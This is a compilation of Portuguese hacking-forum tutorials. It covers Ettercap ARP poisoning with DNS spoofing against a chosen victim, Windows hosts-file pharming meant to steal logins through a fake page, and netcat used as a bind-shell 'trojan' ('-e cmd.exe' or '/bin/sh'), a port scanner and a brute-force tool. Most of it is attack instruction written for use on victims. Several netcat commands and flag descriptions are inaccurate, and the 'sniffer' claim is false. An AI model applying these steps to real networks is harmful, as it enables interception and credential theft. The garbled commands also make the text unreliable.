Tutorial: Usando Kali linux para fazer um ataque de DNS Spoofing com Ettercap

Olá
Hoje gostaria de mostrar como usar o Kali Linux para fazer um ataque de Dns Spoofing usando o Ettercap.

Esse tipo de ataque é muito importante para conseguirmos algumas credenciais durante a execução de um PenTest. Ele consiste em enviar respostas falsas a requisições de DNS que forem feitas.

Para executarmos esse ataque a primeira coisa que queremos é editar o arquivo etter.dns, basicamente ele é como o arquivo hosts do windows e linux, nele podemos configurar para onde as solicitações serão enviadas.
Vamos lá, abra um terminal e digite

# vi /usr/share/ettercap/etter.dns

Podemos editar seguindo o padrão que pode ser visto na imagem acima, salve e saia e após digite ettercap -G que vai abrir o Ettercap em modo gráfico.

Vá em Sniff –> Unified Sniffing e quando solicitado escolha sua placa de rede eth0.



Agora vá em “Hosts” e clique em “Scan for hosts”

Vá novamente em “Hosts” Clique em Host List para visualizar uma lista de todos IP’s disponíveis na rede, selecione qual será a vítima que vai receber as respostas falsas e clique em Add to Target 1



Agora clique em Start –> Start Sniffing.
Após isso vá em MitM –> Arp Poisoning.

Selecione a opção Sniff remote connections conforme abaixo e clique em OK



Agora vá em Plugins –> Manage the Plugins e de um duplo clique em dns_spoof



Feito isso o cliente selecionado vai começar a receber respostas falsas de DNS.

Espero que tenham gostado da dica

Compartilhe nas redes sociais e ajude a divulgar.

Abraço

Creditos: Hernane Carvalho

Pharming Windows

A técnica de Pharming no Windows se baseia em trocar os DNS’s de um arquivo, fazendo assim, você acessar um site sem a intenção de fazer aquilo.

O arquivo é o C:\Windows\System32\drivers\etc e possui uma lista de DNS’s com endereços de IP.

O que ele faz?

Ele simplesmente faz o seguinte:
Quando você digita 127.0.0.1, ele abre o endereço localhost automaticamente… E na barra de endereços, o endereço fica 127.0.0.1.

Pera ae… Isso quer dizer que eu posso fazer a vítima acessar um site, o site aparecer corretamente na barra de endereços e a vítima estar acessando outro site? CORRETO!
Abrindo o arquivo com o bloco de notas, podemos ver:

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ‘#’ symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
127.0.0.1 localhost

Agora, vamos pegar por exemplo, o IP de Google.com e o DNS de Orkut.com e adicionar no arquivo (assim, quando a você tentar acessar o Orkut, você vai cair no Google).

Dando um ping www.google.com, temos:

Disparando www.l.google.com [64.233.163.104] com 32 bytes de dados:
Resposta de 64.233.163.104: bytes=32 tempo=50ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=45ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=46ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=49ms TTL=56

Agora, pegamos o IP do Google.com (64.233.163.104) e acrescentamos, junto ao DNS do Orkut.com, no arquivo hosts.

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ‘#’ symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
127.0.0.1 localhost
64.233.163.104 www.orkut.com

Pronto! Agora, quando você for acessar Orkut.com, vai abrir a página do Google.com (na barra de endereços, continuará Orkut.com).

Assim, se você fizer isso com uma página fake, a vítima verá a barra de endereçõs idêntica, mas estará logando em outro site! Isso foi apenas para explicar como funciona o Pharming (Windows) com um pouco de imaginação e SEing, ai ai…

Credito : Forum Darkers

NetCat - O Canivete suiço do TCP/IP

Vamos dar uma olhada nos comandos do netcat, a opção -H exibe as opções do programa. Basta digitar nc -h e dar enter. Veremos os principais comandos do netcat:

l = Coloca uma porta em estado de listenning(escuta)

L = Coloca uma porta em listenning(escuta), reabrindo a porta caso ela feche

P = Define uma porta

V = ativa o recebimento de eco

U = utiliza o protocolo UDP ao invés de TCP

T = para se conectar a TELNET

O = Gera um log em formato hexadecimal

W = Determina um tempo máximo para aguardar uma reposta

E = Redireciona arquivos.

D = Coloca o netcat em modo furtivo, ou seja, permanece carregado em memória.


Bem, agora que já conhecemos os comandos mais usados do netcat vamos a pratica:

Colocando uma porta em escuta:

Nc -l -p 8080 isso faria com que o netcat colocasse a porta 8080 em escuta, note que foi usado -v para que fosse mostrado a saída do programa na tela “listening on [any] 8080 …“, caso a opção -v não fosse inserida este texto não seria mostrado.

Fazendo um Port-Scanner com o netcat:

nc -vv 127.0.0.1 1-6550 isso faz um scanner da porta 1 à 6550 mais você também pode selecionar as portas que deseja escanear dando um espaço entre os intervalos de portas a ser escaneados ex: nc -vv 127.0.0.1 21 80 23 79 25 isso faria um scanner nas portas 80, 23, 79 e 25.

Fazendo um trojan com o netcat:

Note que basta redirecionar todo o trafego de uma porta enviando a cmd.exe se for windows e bin/bash.sh se for UNIX a sintaxe é a seguinte em sistemas windows nc -L -p 1024 -e cmd.exe e nc -l -p 1024 -e bin/sh em UNIX.

Fazendo um ataque de brute force com o netcat:

O canivete suíço do TCP/IP tem muitas funções interessante uma delas é o brute force um exemplo: nc -vv 79 < c:\usuarios.txt > c:\log.txt note que você precisara de um arquivos com nome de usuários em c: e todo log será gravado em c:\log.txt para que você possa analisar depois. esse força bruta foi feita em cima da porta 79 FINGER mais poderia ser facilmente adaptada a outras portas.

Fazendo um sniffer com o netcat:

O fantástico netcat também pode servir como um sniffer e captura todo trafego em uma rede basta colocar nc -vv -L 127.0.0.1 -p 80 note que o L deve ser maiúsculo pois, esta opção reabre socketes fechados, isso fará com que o netcat capture todo trafego na porta 80 acho que nem é mais necessário dizer que podemos também gravar toda saída em um arquivo TXT, mais bem pra você que ainda não sacou a jogada ai vai nc -vv -L 127.0.0.1 -p 80 > c:\sniffer.txt

Autor: Diablos 4-Ever

Fonte: Desconhecida